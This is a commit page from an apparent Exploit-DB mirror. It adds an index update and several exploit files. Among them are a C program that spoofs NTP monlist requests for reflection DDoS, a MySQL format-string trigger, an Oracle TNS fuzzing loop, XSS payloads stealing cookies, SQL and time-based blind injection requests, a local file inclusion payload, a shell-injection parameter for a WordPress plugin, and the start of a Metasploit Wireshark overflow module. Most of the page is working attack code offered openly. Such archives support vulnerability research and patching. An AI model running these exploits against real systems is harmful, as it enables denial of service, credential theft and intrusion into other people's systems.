bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 04_30_2014

Browse source
This commit is contained in:
Offensive Security 2014-04-30 04:36:30 +00:00
parent 03145e7e42
commit 7ff338dd75
16 changed files with 1060 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

17
files.csv
View file

@ -29771,7 +29771,7 @@ id,file,description,date,author,platform,type,port
33026,platforms/ios/webapps/33026.txt,"Depot WiFi 1.0.0 iOS - Multiple Vulnerabilities",2014-04-25,Vulnerability-Lab,ios,webapps,0
33027,platforms/windows/remote/33027.py,"Kolibri 2.0 GET Request - Stack Buffer Overflow",2014-04-25,Polunchis,windows,remote,80
33028,platforms/linux/local/33028.txt,"JRuby Sandbox 0.2.2 - Sandbox Escape",2014-04-25,joernchen,linux,local,0
33030,platforms/php/webapps/33030.txt,"ApPHP MicroBlog 1.0.1 - Multiple Vulnerability (LFI/RCE)",2014-04-26,JiKo,php,webapps,0
33030,platforms/php/webapps/33030.txt,"ApPHP MicroBlog 1.0.1 - Multiple Vulnerabilities",2014-04-26,JIKO,php,webapps,0
33031,platforms/linux/dos/33031.html,"Mozilla Firefox 3.0.x Large GIF File Background Denial of Service Vulnerability",2009-05-10,"Ahmad Muammar",linux,dos,0
33032,platforms/linux/remote/33032.txt,"'Compress::Raw::Zlib' Perl Module - Remote Code Execution Vulnerability",2009-05-11,"Leo Bergolth",linux,remote,0
33033,platforms/multiple/remote/33033.html,"WebKit JavaScript 'onload()' Event Cross Domain Scripting Vulnerability",2009-05-08,"Michal Zalewski",multiple,remote,0
@ -29809,3 +29809,18 @@ id,file,description,date,author,platform,type,port
33065,platforms/php/webapps/33065.txt,"Horde 3.1 'Passwd' Module Cross Site Scripting Vulnerability",2009-06-05,anonymous,php,webapps,0
33066,platforms/windows/remote/33066.html,"Avax Vector 1.3 'avPreview.ocx' ActiveX Control Buffer Overflow Vulnerability",2009-06-06,Satan_HackerS,windows,remote,0
33068,platforms/php/webapps/33068.txt,"ClanSphere 2009 'text' Parameter Cross Site Scripting Vulnerability",2009-06-06,"599eme Man",php,webapps,0
33069,platforms/windows/local/33069.rb,"Wireshark <= 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow",2014-04-28,metasploit,windows,local,0
33071,platforms/windows/remote/33071.txt,"McAfee ePolicy Orchestrator 4.6.0-4.6.5 (ePowner) - Multiple Vulnerabilities",2014-04-28,st3n,windows,remote,0
33072,platforms/php/webapps/33072.txt,"Adem 0.5.1 - Local File Inclusion",2014-04-28,JIKO,php,webapps,80
33073,platforms/linux/dos/33073.c,"NTP ntpd monlist Query Reflection - Denial of Service",2014-04-28,"Danilo PC",linux,dos,123
33075,platforms/php/webapps/33075.txt,"GeoCore MAX DB Ver. 7.3.3 - Time-Based Blind Injection",2014-04-28,Esac,php,webapps,80
33076,platforms/php/webapps/33076.txt,"Wordpress iMember360 Plugin 3.8.012 - 3.9.001 - Multiple Vulnerabilities",2014-04-28,"Everett Griffiths",php,webapps,80
33077,platforms/linux/dos/33077.c,"MySQL <= 5.0.75 'sql_parse.cc' Multiple Format String Vulnerabilities",2009-06-08,kingcope,linux,dos,0
33078,platforms/multiple/remote/33078.txt,"HP ProCurve Threat Management Services zl ST.1.0.090213 Module CRL Security Bypass Vulnerability",2009-06-13,anonymous,multiple,remote,0
33079,platforms/multiple/remote/33079.txt,"Oracle Weblogic Server 10.3 'console-help.portal' Cross Site Scripting Vulnerability",2009-06-14,"Alexandr Polyakov",multiple,remote,0
33081,platforms/multiple/remote/33081.cpp,"Oracle 9i/10g Database CVE-2009-1019 Remote Network Authentication Vulnerability",2009-06-14,"Dennis Yurichev",multiple,remote,0
33082,platforms/multiple/remote/33082.txt,"Oracle 10g Secure Enterprise Search 'search_p_groups' Parameter Cross Site Scripting Vulnerability",2009-06-14,"Alexandr Polyakov",multiple,remote,0
33085,platforms/php/webapps/33085.txt,"Scriptsez Easy Image Downloader 'id' Parameter Cross Site Scripting Vulnerability",2009-06-14,Moudi,php,webapps,0
33086,platforms/multiple/dos/33086.txt,"America's Army 3.0.4 Invalid Query Remote Denial of Service Vulnerability",2009-06-06,"Luigi Auriemma",multiple,dos,0
33087,platforms/php/webapps/33087.txt,"PHPLive! 3.2.2 'request.php' SQL Injection Vulnerability",2009-06-16,boom3rang,php,webapps,0
33089,platforms/windows/remote/33089.pl,"iDefense COMRaider ActiveX Control Multiple Insecure Method Vulnerabilities",2009-06-17,"Khashayar Fereidani",windows,remote,0

Can't render this file because it is too large.

167
platforms/linux/dos/33073.c Executable file
View file

@ -0,0 +1,167 @@
/*
* Exploit Title: CVE-2013-5211 PoC - NTP DDoS amplification
* Date: 28/04/2014
* Code Author: Danilo PC - <DaNotKnow@gmail.com>
* CVE : CVE-2013-5211
*/
/* I coded this program to help other to understand how an DDoS attack amplified by NTP servers works (CVE-2013-5211)
* I took of the code that generates a DDoS, so this code only sends 1 packet. Why? Well...there's a lot of kiddies out there,
* if you know how to program, making a loop or using with other tool is piece of cake. There core idea is there, just use it as you please.
*/
//------------------------------------------------------------------------------------------------//
//------------------------------------------------------------------------------------------------//
#include <stdio.h> //For on printf function
#include <string.h> //For memset
#include <sys/socket.h> //Structs and Functions used for sockets operations.
#include <stdlib.h> //For exit function
#include <netinet/ip.h> //Structs for IP header
//Struct for UDP Packet
struct udpheader{
unsigned short int udp_sourcePortNumber;
unsigned short int udp_destinationPortNumber;
unsigned short int udp_length;
unsigned short int udp_checksum;
};
// Struct for NTP Request packet. Same as req_pkt from ntpdc.h, just a little simpler
struct ntpreqheader {
unsigned char rm_vn_mode; /* response, more, version, mode */
unsigned char auth_seq; /* key, sequence number */
unsigned char implementation; /* implementation number */
unsigned char request; /* request number */
unsigned short err_nitems; /* error code/number of data items */
unsigned short mbz_itemsize; /* item size */
char data[40]; /* data area [32 prev](176 byte max) */
unsigned long tstamp; /* time stamp, for authentication */
unsigned int keyid; /* encryption key */
char mac[8]; /* (optional) 8 byte auth code */
};
// Calculates the checksum of the ip header.
unsigned short csum(unsigned short *ptr,int nbytes)
{
register long sum;
unsigned short oddbyte;
register short answer;
sum=0;
while(nbytes>1) {
sum+=*ptr++;
nbytes-=2;
}
if(nbytes==1) {
oddbyte=0;
*((u_char*)&oddbyte)=*(u_char*)ptr;
sum+=oddbyte;
}
sum = (sum>>16)+(sum & 0xffff);
sum = sum + (sum>>16);
answer=(short)~sum;
return(answer);
}
//Da MAIN
int main(int argc, char **argv)
{
int status; // Maintains the return values of the functions
struct iphdr *ip; // Pointer to ip header struct
struct udpheader *udp; // Pointer to udp header struct
struct ntpreqheader *ntp; // Pointer to ntp request header struct
int sockfd; // Maintains the socket file descriptor
int one = 1; // Sets the option IP_HDRINCL of the sockt to tell the kernel that the header are alredy included on the packets.
struct sockaddr_in dest; // Maintains the data of the destination address
char packet[ sizeof(struct iphdr) + sizeof(struct udpheader) + sizeof(struct ntpreqheader) ]; //Packet itself
// Parameters check
if( argc != 3){
printf("Usage: ./ntpDdos [Target IP] [NTP Server IP]\n");
printf("Example: ./ntpDdos 1.2.3.4 127.0.0.1 \n");
printf("Watch it on wireshark!\n");
printf("Coded for education purpose only!\n");
exit(1);
}
// Create a socket and tells the kernel that we want to use udp as layer 4 protocol
sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_UDP);
if (sockfd == -1){
printf("Error on initializing the socket\n");
exit(1);
}
//Sets the option IP_HDRINCL
status = setsockopt( sockfd, IPPROTO_IP, IP_HDRINCL, &one, sizeof one);
if (status == -1){
printf("Error on setting the option HDRINCL on socket\n");
exit(1);
}
//"Zeroes" all the packet stack
memset( packet, 0, sizeof(packet) );
//Mounts the packet headers
// [ [IP HEADER] [UDP HEADER] [NTP HEADER] ] --> Victory!!!
ip = (struct iphdr *)packet;
udp = (struct udpheader *) (packet + sizeof(struct iphdr) );
ntp = (struct ntpreqheader *) (packet + sizeof(struct iphdr) + sizeof(struct udpheader) );
//Fill the IP Header
ip->version = 4; //IPv4
ip->ihl = 5; //Size of the Ip header, minimum 5
ip->tos = 0; //Type of service, the default value is 0
ip->tot_len = sizeof(packet); //Size of the datagram
ip->id = htons(1234); //LengthIdentification Number
ip->frag_off = 0; //Flags, zero represents reserved
ip->ttl = 255; //Time to Live. Maximum of 255
ip->protocol = IPPROTO_UDP; //Sets the UDP as the next layer protocol
ip->check = 0; //Checksum.
ip->saddr = inet_addr( argv[1] ); //Source ip ( spoofing goes here)
ip->daddr = inet_addr( argv[2] ); //Destination IP
//Fills the UDP Header
udp->udp_sourcePortNumber = htons( atoi( "123" ) ); //Source Port
udp->udp_destinationPortNumber = htons(atoi("123")) ; //Destination Port
udp->udp_length = htons( sizeof(struct udpheader) + sizeof(struct ntpreqheader) ); //Length of the packet
udp->udp_checksum = 0; //Checksum
//Calculate the checksums
ip->check = csum((unsigned short *)packet, ip->tot_len); //Calculate the checksum for iP header
//Sets the destination data
dest.sin_family = AF_INET; // Address Family Ipv4
dest.sin_port = htons (atoi( "123" ) ) ; // Destination port
dest.sin_addr.s_addr = inet_addr( argv[2] ); // Destination Endereço para onde se quer enviar o pacote
//Fills the NTP header
//Ok, here is the magic, we need to send a request ntp packet with the modes and codes sets for only MON_GETLIST
//To do this we can import the ntp_types.h and use its structures and macros. To simplify i've created a simple version of the
// ntp request packet and hardcoded the values for the fields to make a "MON_GETLIST" request packet.
// To learn more, read this: http://searchcode.com/codesearch/view/451164#127
ntp->rm_vn_mode=0x17; //Sets the response bit to 0, More bit to 0, Version field to 2, Mode field to 7
ntp->implementation=0x03; //Sets the implementation to 3
ntp->request=0x2a; //Sets the request field to 42 ( MON_GETLIST )
//All the other fields of the struct are zeroed
// Sends the packets
status = sendto(sockfd, packet, ip->tot_len, 0, (struct sockaddr *)&dest, sizeof(dest) );
if(status <0){
printf("Failed to send the packets\n");
exit(1);
}
}

52
platforms/linux/dos/33077.c Executable file
View file

@ -0,0 +1,52 @@
source: http://www.securityfocus.com/bid/35609/info
MySQL is prone to multiple format-string vulnerabilities.
Attackers can leverage these issues to execute arbitrary code within the context of the vulnerable application. Failed attacks will likely cause denial-of-service conditions.
MySQL 4.0.0 through 5.0.75 are vulnerable; other versions may also be affected.
#include <stdlib.h>
#include <stdio.h>
#define USE_OLD_FUNCTIONS
#include <mysql/mysql.h>
#define NullS (char *) 0
int
main (int argc, char **argv)
{
MYSQL *mysql = NULL;
mysql = mysql_init (mysql);
if (!mysql)
{
puts ("Init faild, out of memory?");
return EXIT_FAILURE;
}
if (!mysql_real_connect (mysql, /* MYSQL structure to use */
"localhost", /* server hostname or IP address */
"monty", /* mysql user */
"montypython", /* password */
NULL, /* default database to use, NULL for none */
0, /* port number, 0 for default */
NULL, /* socket file or named pipe name */
CLIENT_FOUND_ROWS /* connection flags */ ))
{
puts ("Connect failed\n");
}
else
{
puts ("Connect OK\n");
// mysql_create_db(mysql, "%s%s%s%s%s");
simple_command(mysql, COM_CREATE_DB, argv[1], strlen(argv[1]), 0);
}
mysql_close (mysql);
return EXIT_SUCCESS;
}

9
platforms/multiple/dos/33086.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/35703/info
America's Army is prone to a remote denial-of-service vulnerability because the application fails to properly handle invalid queries.
Exploiting this issue allows remote attackers to cause the application to crash, effectively denying service to legitimate users.
America's Army 3.0.4 and prior versions are vulnerable.
echo blah | nc SERVER 39300 -v -v -u

12
platforms/multiple/remote/33078.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/35659/info
HP ProCurve Threat Management Services zl Module is prone to a security-bypass vulnerability.
Successful exploits may allow attackers to bypass certain security restrictions, which may aid in launching further attacks.
ProCurve Threat Management Services zl Module J9155A running vST.1.0.090213 firmware or prior is vulnerable.
1. Go to VPN-->Certificates--> CRL page and load a CRL list.
2. Save the entire configuration.
3. Reboot the TMS zl Module.
4. Once the TMS zl Module is available, go to VPN--> Certificates--> CRL page and the CRL is no longer available.

9
platforms/multiple/remote/33079.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/35673/info
Oracle WebLogic Server is prone to a cross-site scripting vulnerability. An attacker with 'WLS Console Package' privileges can exploit this issue.
The attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
This vulnerability affects Oracle WebLogic Server 10.3.
http://www.example.com:7011/consolehelp/console-help.portal?_nfpb=true&_pageLabel=ConsoleHelpSearchPage&searchQuery="><script>alert('DSECRG')</script>

294
platforms/multiple/remote/33081.cpp Executable file
View file

@ -0,0 +1,294 @@
source: http://www.securityfocus.com/bid/35680/info
Oracle Database is prone to a remote vulnerability in Network Authentication.
The vulnerability can be exploited over the 'Oracle Net' protocol. An attacker doesn't require privileges to exploit this vulnerability.
This vulnerability affects the following supported versions:
9.2.0.8
9.2.0.8DV
10.1.0.5
10.2.0.4
11.1.0.7
// PoC for CVE-2009-1019
// discovered by Dennis Yurichev <dennis@conus.info>
// for more information: http://blogs.conus.info/node/24
// run: CVE-2009-1019.exe <host>
#include <winsock2.h>
#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <assert.h>
#include <string>
void s_send (SOCKET s, unsigned char *msg, DWORD size)
{
int sent;
printf ("s_send: begin\n");
sent=send (s, (char*)msg, size, 0);
if (sent==SOCKET_ERROR)
{
printf ("send() -> SOCKET_ERROR, WSAGetLastError=%d\n", WSAGetLastError());
} else
if (sent!=size)
printf ("sent only %d bytes\n", sent);
printf ("s_send: end\n");
};
void s_recv (SOCKET s)
{
char buf[20000];
int r;
struct timeval t;
fd_set fd;
t.tv_sec=0;
t.tv_usec=100000; // 100 ms
printf ("s_recv: begin\n");
FD_ZERO(&fd);
FD_SET(s, &fd);
if (select (0, &fd, 0, 0, &t))
// if (select (0, &fd, 0, 0, NULL))
{
r=recv (s, buf, 20000, 0);
if (r!=0 && r!=-1)
{
printf ("got %d\n", r);
}
else
{
printf ("connection lost, r=%d\n", r);
};
}
else
{
printf ("select() returns zero\n");
};
};
unsigned char NSPTCN[]=
{
0x00, 0x3A, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00,
0x01, 0x39, 0x01, 0x2C, 0x00, 0x81, 0x08, 0x00,
0x7F, 0xFF, 0xC6, 0x0E, 0x00, 0x00, 0x01, 0x00,
0x00, 0x00, 0x00, 0x3A, 0x00, 0x00, 0x07, 0xF8,
//^^ ^^ cmd len
0x0C, 0x0C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00
};
#define NSPTCN_HEADER_LEN 58
unsigned char NSPTDA[]=
{
0x00, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00,
// ^^ ^^ packet len
0x00, 0x00
};
#define NSPTDA_HEADER_LEN 10
void s_send_NSPTDA (SOCKET s, char *msg, int size)
{
char * buf;
int sz=size + NSPTDA_HEADER_LEN;
buf=(char*)malloc (sz);
NSPTDA[0]=( sz ) >> 8;
NSPTDA[1]=( sz ) & 0xFF;
memcpy (buf, NSPTDA, NSPTDA_HEADER_LEN);
memcpy (buf + NSPTDA_HEADER_LEN, msg, size);
printf ("s_send_NSPTDA: sending %d bytes...\n", sz);
s_send (s, (unsigned char*)buf, sz);
free (buf);
};
void s_send_TNS_command (SOCKET s, const char *cmd)
{
unsigned char * pkt;
int cmd_len=strlen (cmd);
printf ("sending [%s]\n", cmd);
printf ("len: %d\n", cmd_len);
if (cmd_len<231)
{
int str_len=strlen(cmd);
int pkt_len=str_len+58;
pkt=(unsigned char*)malloc (str_len+58);
memcpy (pkt,
"\x00\x00\x00\x00\x01\x00\x00\x00"
// plenL and plenH
"\x01\x38\x01\x2c\x00\x00\x08\x00"
"\x7f\xff\x86\x0e\x00\x00\x01\x00"
"\x00\x00\x00\x3a\x00\x00\x00\x00"
// clenL clenH
"\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x0d\x40\x00\x00"
"\x00\x0e\x00\x00\x00\x00\x00\x00"
"\x00\x00", 58);
memcpy (pkt+58, cmd, str_len);
pkt[1]=pkt_len&0xFF;
pkt[0]=(pkt_len>>8)&0xFF;
pkt[25]=str_len&0xFF;
pkt[24]=(str_len>>8)&0xFF;
s_send (s,pkt, pkt_len);
free (pkt);
}
else
{
NSPTCN[24]=cmd_len >> 8;
NSPTCN[25]=cmd_len & 0xFF;
s_send (s, &NSPTCN[0], NSPTCN_HEADER_LEN);
assert (pkt=(unsigned char*)malloc ( cmd_len + NSPTDA_HEADER_LEN));
NSPTDA[0]=( cmd_len + NSPTDA_HEADER_LEN ) >> 8;
NSPTDA[1]=( cmd_len + NSPTDA_HEADER_LEN ) & 0xFF;
memcpy (pkt, NSPTDA, NSPTDA_HEADER_LEN);
memcpy (pkt + NSPTDA_HEADER_LEN, cmd, cmd_len);
s_send (s, pkt, NSPTDA_HEADER_LEN + cmd_len);
free (pkt);
};
};
bool try_host (char * h, int i, int j)
{
struct hostent *hp;
WSADATA wsaData;
struct sockaddr_in sin;
int r;
struct timeval t;
fd_set fd;
SOCKET s;
char pkt146[146];
WSAStartup(MAKEWORD(1, 1), &wsaData);
hp=gethostbyname (h);
assert (hp!=NULL);
s=socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
assert (s!=INVALID_SOCKET);
{
u_long on=1;
assert (ioctlsocket(s, FIONBIO, &on) != -1);
};
sin.sin_family=AF_INET;
sin.sin_port=htons(1521);
memcpy(&sin.sin_addr, hp->h_addr, hp->h_length);
r=connect(s, (struct sockaddr *)&sin, sizeof(sin));
t.tv_sec=3;
t.tv_usec=0;
FD_ZERO(&fd);
FD_SET(s, &fd);
if (select (0, 0, &fd, 0, &t))
{
printf ("connected to %s\n", h);
s_send_TNS_command (s, "(DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=orcl)(CID=(PROGRAM=client.exe)(HOST=client_host)(USER=dennis)))(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.0.102)(PORT=1521)))");
// waiting for NSPTRS
s_recv(s);
s_send_TNS_command (s, "(DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=orcl)(CID=(PROGRAM=client.exe)(HOST=client_host)(USER=dennis)))(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.0.102)(PORT=1521)))");
// waiting for NSPTAC
s_recv(s);
memcpy (pkt146,
"\xDE\xAD\xBE\xEF\x00\x92"
"\x0A\x20\x01\x00\x00\x04\x00\x00"
"\x04\x00\x03\x00\x00\x00\x00\x00"
"\x04\x00\x05\x0A\x20\x01\x00\x00"
"\x08\x00\x01\x00\x00\x14\xCC\x5F"
"\x40\x95\x3E\x00\x12\x00\x01\xDE"
"\xAD\xBE\xEF\x00\x03\x00\x00\x00"
"\x04\x00\x04\x00\x01\x00\x01\x00"
"\x02\x00\x01\x00\x03\x00\x00\x00"
"\x00\x00\x04\x00\x05\x0A\x20\x01"
"\x00\x00\x02\x00\x03\xE0\xE1\x00"
"\x02\x00\x06\xFC\xFF\x00\x02\x00"
"\x02\x00\x00\x00\x00\x00\x04\x00"
"\x05\x0A\x20\x01\x00\x00\x0C\x00"
"\x01\x00\x11\x06\x10\x0C\x0F\x0A"
"\x0B\x08\x02\x01\x03\x00\x03\x00"
"\x02\x00\x00\x00\x00\x00\x04\x00"
"\x05\x0A\x20\x01\x00\x00\x03\x00"
"\x01\x00\x03\x01", 146);
pkt146[i]=j;
printf ("i=%d j=%02X\n", i, j);
s_send_NSPTDA (s, pkt146, 146);
s_recv(s);
assert (closesocket (s)==0);
return true;
}
else
{
printf ("while connect(): select() returns zero\n");
assert (closesocket (s)==0);
return false;
};
};
void main(int argc, char * argv[])
{
assert (argv[1]!=NULL);
for (;;)
for (int pos=0;pos<146;pos++)
{
try_host (argv[1], pos, 0);
Sleep (1000); // 1 second
};
};

7
platforms/multiple/remote/33082.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/35681/info
Oracle Database is prone to a cross-site scripting vulnerability that affects the Secure Enterprise Search component.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com:7777/search/query/search?search.timezone=&search_p_groups="&#039;><IMG%20SRC=javascript:alert(document.cookie)>&q=1234&btnSearch=Search

27
platforms/php/webapps/33072.txt Executable file
View file

@ -0,0 +1,27 @@
----------[exploit Debut]
[Local File Include Vulnerability]
----------[Script Info]
Author : JIKO
----------[Script Info]
Site : https://github.com/4FSB/Adem && http://adem.faares.com/demo
Version : 0.5.1
Download : https://codeload.github.com/4FSB/Adem/zip/master
----------[exploit Info]
Exploit :
http://Path/index.php?p=File%00
Line : 8-10
Page : index.php
Code :
if(is_file($file) && file_exists($file)){
include $file;
}
----------[exploit Fin]

112
platforms/php/webapps/33075.txt Executable file
View file

@ -0,0 +1,112 @@
###########################################################################################
#Exploit Title: GeoCore MAX DB Ver. 7.3.3 - Time-Based Blind Injection
#Official site: http://geodesicsolutions.com
#Risk Level: High
#Vendor : http://geodesicsolutions.com
#Exploit Author: Esac
#Homepage author : www.iss4m.ma
#Last Checked: 25/04/2014
###########################################################################################
+----------+
| OVERVIEW |
+----------+
GeoCore is the new name for all Geodesic Solutions software packages beginning with version 7.0.0.
The products previously known as:
GeoClassAuctions Enterprise
GeoClassifieds Enterprise
GeoClassifieds Premier
GeoClassifieds Basic
GeoAuctions Enterprise
GeoAuctions Premier
are now unified into a single product.
Sites running GeoCore may use both Classifieds and Auctions, or may turn off one or the other as needed. Additional item types may be added in the future.
GeoCore allows much greater flexibility for you, the customer: many features previously available only in the Enterprise-level software packages have been opened up to everyone, either as built-in features or Add Ons that may be purchased separately. With GeoCore, you now have the power to build exactly the type of site you want: add the features you need, leave the ones you don't, and add more Add Ons to your site at any time!
GeoCore is the next step forward for Geodesic Solutions, and a powerful revolution in the field of Classifieds and Auctions software. Contact us today to find out how GeoCore can help you!
Geocore is a premium version {
GeoCore - Classifieds : $399.00 USD
GeoCore - Auctions : $399.00 USD
GeoCore - MAX : $499.00 USD
}
+-----------------------------------------------------------------------------------+
+--------------------------------+
| Time-Based Blind Injection |
+--------------------------------+
1) param : b | method : GET
http://server/index.php?a=5&b=15 {Inject here}
Real exploitation :
https://server/index.php?a=5&b=15 and sleep(2) &filterValue=1997&page=2&setFilter=cs_94
==> will pause for 2 seconds and diplay the page after
https://server/index.php?a=5&b=15 and sleep(10) &filterValue=1997&page=2&setFilter=cs_94
==> will pause for 10 seconds and diplay the page after depending on load of files(imgs , css , js scripts)
2) Vuln URL : /register.php?b=1 | URL encoded POST input c[password] set to secret"=sleep(3)="
Vuln Url: /register.php?b=1 | URL encoded POST input c[username] set to Esac"=sleep(3)="
Example Real exploitation :
+---------------+
HTTP headers : |
+---------------+
POST /register.php?b=1 HTTP/1.1
Content-Length: 633
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: classified_session=2e766bb87b762c7461a4367f11f67b28; developer_force_type=MAX; master_auctions=off; master_classifieds=off; master_site_fees=on; classifieds=on; auctions=on; css_primary_tset=green_lite_primary; css_secondary_tset=black_secondary; admin_classified_session=d4f1b96a342a64fe272217ba14977f27; killmenothing
Host: server.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*
c[address]=007 undertake&c[address_2]=007 undertake&c[agreement]=yes&c[business_type]=1&c[city]=Underground&c[company_name]=Infinity Security&c[email]=h@ck3r.cc&c[email_verifier]=h@ck3r.c&c[fax]=317-317-3137&c[firstname]=Esac&c[lastname]=Sec&c[password]=secret"=sleep(2)="&c[password_confirm]=acUn3t1x&c[phone]=010-239-1233&c[phone_2]=010-239-1233&c[sessionId]=5b6cb974e9eec4e7549c143885d82376&c[url]=1&c[username]=Esac&c[zip]=12345&force_validation=Submit Validation Results&locations[1]=1
+---------+
Response |
+---------+
HTTP/1.1 200 OK
Date: Tue, 22 Apr 2014 19:36:20 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.4.27
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Set-Cookie: classifieds=on; path=/
Set-Cookie: auctions=on; path=/
Set-Cookie: classified_session=dea12eb168dc174537517f1688070116; path=/; domain=.domain.com
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 16043
+--------------------------------------------------------------------------------------+
If you want peace of mind , do not find fault with others , rather learn to see your own faults. Learn to make the whole world your own , no one is a stranger, this whole world is your own :)
============================================ WwW.Iss4m.Ma ============================================

96
platforms/php/webapps/33076.txt Executable file
View file

@ -0,0 +1,96 @@
------------
BACKGROUND
------------
"iMember360is a WordPress plugin that will turn a normal WordPress site
into a full featured membership site. It includes all the protection
controls you can imagine, yet driven by Infusionsoft's second-to-none CRM
and e-commerce engine."
-- http://imember360.com/
This plugin is hailed by some as being one of the power tools of the "big
boys" of internet marketing, and according to the author it is installed on
some 5,000 sites worldwide.
Unfortunately, the author is openly hostile at the suggestion that there
are problems with his code: attempts to alert him to the problems with the
plugin resulted in a flurry of insults, accusations, and nasty-grams to me
and others working on the project. He accused me of telling "blatant lies"
and fabricating screenshots of the vulnerabilities (!!!). So here we are
in the disclosure list. Developers would do well to error on the side of
humility here and remember that the only acceptable response to a bug
report you disagree with is "cannot reproduce," and it my sincere hope that
the author gets therapy, a security audit, or both: his customers deserve
more than the incompetence and aggression.
-------------------
VULNERABILITIES
-------------------
* Disclosure of database credentials
* XSS Vulnerabilities
* Arbitrary user deletion
* Arbitrary code execution
-----------------
AFFECTED VERSIONS
-----------------
v3.8.012 thru v3.9.001
-----------------------
PROOF OF CONCEPT
-----------------------
Dictionary based URL scanning of a site where the plugin is installed
revealed numerous $_GET parameters that triggered special functionality
that rarely seemed properly checked for permissions. The specific
vulnerabilities include:
DATABASE CREDENTIALS DISCLOSED
?i4w_dbinfo=
Prior to version 3.9.001, setting this parameter on a site where the plugin
is installed would trigger the full database credentials to be printed,
including database name, user, password, and encoding.
After version 3.9.001, this exploit requires that the user request an admin
URL (e.g. as a registered subscriber).
XSS VULNERABILITIES
?decrypt=<any XSS code here>
?encrypt=<any XSS code here>
If set, both of these parameters will simply print what follows verbatim
onto the page and exit: nothing else is printed. A phishing attack is
quite simple here because the attackers do not have to camouflage anything:
the remote Javascript file can simply generate the *entire* page. Just a
reminder that some hosts filter the $_GET parameters (e.g. escaping quotes)
and not all browsers interpret malformed tags correctly, but this these
parameters are vulnerable to XSS attacks. On some setups with caching,
this may result in a persistent XSS attack when subsequent page views serve
up the compromised page.
DELETE ARBITRARY USERS
?i4w_clearuser=&Email=<user_login_name>
If these 2 parameters are defined, the named user will be *deleted* from
the Wordpress database (with one catch). The i4w_clearuser parameter must
match the API key used by the plugin, but if the plugin has not yet had the
license activated, then the API key is null, so the attack succeeds.
Wordpress login names are printed in comments or can be guessed (e.g. the
ubiquitous "admin").
ARBITRARY CODE EXECUTION
?i4w_trace=; <put any code here> #
The i4w_trace parameter passes unescaped values to the system shell when
the page is being requested by an admin (the user must be authenticated as
an administrator for this to work). Put any code you want in between the
";" and the "#". This makes for a dangerous phishing attack if you can
convince an admin to click on a prepared link.

9
platforms/php/webapps/33085.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/35701/info
Easy Image Downloader is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
The following example URI is available:
http://www.example.com/easy_image/main.php?action=detail&id= XSS TO ADD: 1>'><ScRiPt%20%0a%0d>alert(334415002616)%3B</ScRiPt>

9
platforms/php/webapps/33087.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/35718/info
PHPLive! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
PHPLive! 3.2.1 and 3.2.2 are vulnerable; other versions may also be affected.
http://www.example.com/phplive/request.php?l=admin&x=1 AND 1=1

151
platforms/windows/local/33069.rb Executable file
View file

@ -0,0 +1,151 @@
# Exploit Title: Wireshark 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer
Overflow
# Date: 24/04/2014
# Exploit Author: j0sm1
# Vendor Homepage: www.wireshark.org
# Software Link: http://wireshark.askapache.com/download/win32/all-versions/
# Version: < 1.8.12/1.10.5
# Tested on: Windows XP SP3
# CVE : cve-2014-2299
# Metasploit URL module:
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb
#
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Wireshark <= 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow',
'Description' => %q{
This module triggers a stack buffer overflow in Wireshark <= 1.8.12/1.10.5
by generating an malicious file.)
},
'License' => MSF_LICENSE,
'Author' =>
[
'Wesley Neelen', # Discovery vulnerability
'j0sm1', # Exploit and msf module
],
'References' =>
[
